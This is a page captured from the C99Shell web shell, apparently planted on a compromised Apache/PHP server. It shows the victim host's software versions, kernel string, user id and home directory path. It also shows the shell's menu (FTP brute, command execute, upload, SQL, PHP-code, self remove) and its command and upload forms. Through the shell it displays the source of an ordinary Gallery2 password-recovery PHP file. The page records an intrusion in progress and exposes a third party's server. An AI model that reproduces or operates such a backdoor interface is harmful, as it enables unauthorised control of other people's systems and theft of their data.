!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/home/jerryg/public_html/gallery2/modules/core/   drwxr-xr-x
Free 318.34 GB of 458.09 GB (69.49%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     UserRecoverPasswordAdmin.inc (5.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Gallery - a web based photo album viewer and editor
 * Copyright (C) 2000-2007 Bharat Mediratta
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or (at
 * your option) any later version.
 *
 * This program is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street - Fifth Floor, Boston, MA  02110-1301, USA.
 */

/**
 * This controller will handle the recovery of passwords that have
 * been lost or forgotten by the user.
 * @package GalleryCore
 * @subpackage UserInterface
 * @author Jay Rossiter <cryptographite@users.sf.net>
 * @version $Revision: 15569 $
 */
class UserRecoverPasswordAdminController extends GalleryController {

    
/**
     * @see GalleryController::handleRequest
     */
    
function handleRequest($form) {
    global 
$gallery;
    
$platform =& $gallery->getPlatform();
    
$session =& $gallery->getSession();

    
$status $error $results = array();

    if (isset(
$form['action']['recover'])) {
        
$authFile GALLERY_CONFIG_DIR '/login.txt';
        
$authFromFile $platform->is_readable($authFile) ?
        
trim($platform->file_get_contents($authFile)) : '';

        if (
$session->get('core.UserRecoverPasswordAdminAuthKey') != $authFromFile) {
        
$error[] = 'form[error][authString][incorrect]';
        }

        if (empty(
$error)) {
        if (empty(
$form['userName'])) {
            
$error[] = 'form[error][userName][missing]';
        }

        if (empty(
$form['password1']) || empty($form['password2'])) {
            
$error[] = 'form[error][password][missing]';
        } else if (
$form['password1'] != $form['password2']) {
            
$error[] = 'form[error][password][mismatch]';
        }
        }

        if (empty(
$error)) {
        list (
$ret$user) = GalleryCoreApi::fetchUserByUsername($form['userName']);
        if (
$ret && !($ret->getErrorCode() & ERROR_MISSING_OBJECT)) {
            return array(
$retnull);
        }

        if (isset(
$user)) {
            list (
$ret$lockId) = GalleryCoreApi::acquireWriteLock($user->getId());
            if (
$ret) {
            return array(
$retnull);
            }

            list (
$ret$user) = $user->refresh();
            if (
$ret) {
            return array(
$retnull);
            }

            
$user->changePassword($form['password1']);

            
$ret $user->save();
            if (
$ret) {
            return array(
$retnull);
            }

            
$ret GalleryCoreApi::releaseLocks($lockId);
            if (
$ret) {
            return array(
$retnull);
            }

            
$status['passwordRecovered'] = 1;

            
/*
             * Return 0 is essential - it prevents core.UserLogin from sending the
             * user back to the recovery page after logging in
             */
            
$results['return'] = 0;
            
$subView 'core.UserLogin';

            
$session->remove('core.UserRecoverPasswordAdminAuthKey');
        } else {
            
$error[] = 'form[error][userName][incorrect]';
        }
        }
    } else if (isset(
$form['action']['cancel'])) {
        
$results['return'] = 1;
    }

    if (empty(
$subView)) {
        
$subView 'core.UserRecoverPasswordAdmin';
    }

    if (empty(
$error) && !isset($form['action']['refresh'])) {
        
$results['redirect']['view'] = 'core.UserAdmin';
        
$results['redirect']['subView'] = $subView;

    } else  {
        
$results['delegate']['view'] = 'core.UserAdmin';
        
$results['delegate']['subView'] = 'core.UserRecoverPasswordAdmin';
    }

    
$results['status'] = $status;
    
$results['error'] = $error;

    return array(
null$results);
    }
}

/**
 * This view shows information about password recovery
 */
class UserRecoverPasswordAdminView extends GalleryView {

    
/**
     * @see GalleryView::loadTemplate
     */
    
function loadTemplate(&$template, &$form) {
    global 
$gallery;
    
$platform =& $gallery->getPlatform();
    
$session =& $gallery->getSession();

    
$status $error = array();
    
$authFile GALLERY_CONFIG_DIR '/login.txt';

    if (
$form['formName'] != 'UserRecoverPasswordAdmin') {
        
$form['formName'] = 'UserRecoverPasswordAdmin';

        
/* Don't display the Authorization Incorrect error on first page load */
        
$status['firstLoad'] = 1;

        
/* Generate the auth string on the first visit to this view */
        
$this->_generateAuthString();
    }

    
$authString $session->get('core.UserRecoverPasswordAdminAuthKey');

    if (!
$platform->file_exists($authFile)) {
        
$error['authFile']['missing'] = 1;
    } else if (!
$platform->is_readable($authFile)) {
        
$error['authFile']['unreadable'] = 1;
    } else {
        
$authStringFromFile trim($platform->file_get_contents($authFile));
        if (
$authStringFromFile == $authString) {
        
$status['authString']['correct'] = 1;
        } else {
        
$error['authString']['incorrect'] = 1;
        }
    }

    
$status['userName'] = GalleryUtilities::getRequestVariables('userName');

    
$UserRecoverPasswordAdmin['authString'] = $authString;
    
$UserRecoverPasswordAdmin['error'] = $error;
    
$UserRecoverPasswordAdmin['status'] = $status;
    
$template->setVariable('UserRecoverPasswordAdmin'$UserRecoverPasswordAdmin);
    
$template->setVariable('controller''core.UserRecoverPasswordAdmin');
    return array(
null, array('body' => 'modules/core/templates/UserRecoverPasswordAdmin.tpl'));
    }

    
/**
     * Generate the authorization string used for login.txt
     * @access private
     */
    
function _generateAuthString() {
    global 
$gallery;
    
$session =& $gallery->getSession();

    for (
$len=64$rand='';
         
strlen($rand) < $len;
         
$rand .= chr(!mt_rand(02) ? mt_rand(4857) :
              (!
mt_rand(01) ? mt_rand(6590) :
               
mt_rand(97122))));
    
$session->put('core.UserRecoverPasswordAdminAuthKey'md5($rand));
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0181 ]--